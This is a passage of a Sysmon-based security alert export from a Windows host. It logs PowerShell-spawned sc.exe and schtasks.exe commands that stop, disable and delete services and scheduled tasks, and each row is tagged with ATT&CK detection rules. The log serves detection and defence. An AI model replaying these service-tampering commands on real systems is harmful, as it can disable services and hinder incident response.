Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.174",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.828 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-001044583000} +ProcessId: 4768 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.833250700Z"",""eventRecordID"":""3745"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.828\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-001044583000}\r\nProcessId: 4768\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft Telemetry\""\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.828"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-001044583000}"",""processId"":""4768"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Microsoft Telemetry\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.116",8,"ATT&CK T1489: Stop 
Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.761 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-0010d8553000} +ProcessId: 7816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.768775500Z"",""eventRecordID"":""3742"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.761\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-0010d8553000}\r\nProcessId: 7816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 
System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.761"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-0010d8553000}"",""processId"":""7816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.075",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.692 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-001083533000} +ProcessId: 2672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.696881900Z"",""eventRecordID"":""3739"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.692\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-001083533000}\r\nProcessId: 2672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.692"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-001083533000}"",""processId"":""2672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.031",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.661 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-0010ac523000} +ProcessId: 7924 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config xWinWpdSrv Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config xWinWpdSrv Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.667480200Z"",""eventRecordID"":""3738"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.661\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-0010ac523000}\r\nProcessId: 7924\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config xWinWpdSrv Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:32.661"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-0010ac523000}"",""processId"":""7924"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config xWinWpdSrv Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.530",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.418 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00103b2d2f00} +ProcessId: 868 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.427343400Z"",""eventRecordID"":""3590"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.418\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00103b2d2f00}\r\nProcessId: 868\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.418"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-00103b2d2f00}"",""processId"":""868"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.501",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.382 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010902b2f00} +ProcessId: 2772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.385206000Z"",""eventRecordID"":""3589"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.382\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010902b2f00}\r\nProcessId: 2772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.382"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-0010902b2f00}"",""processId"":""2772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 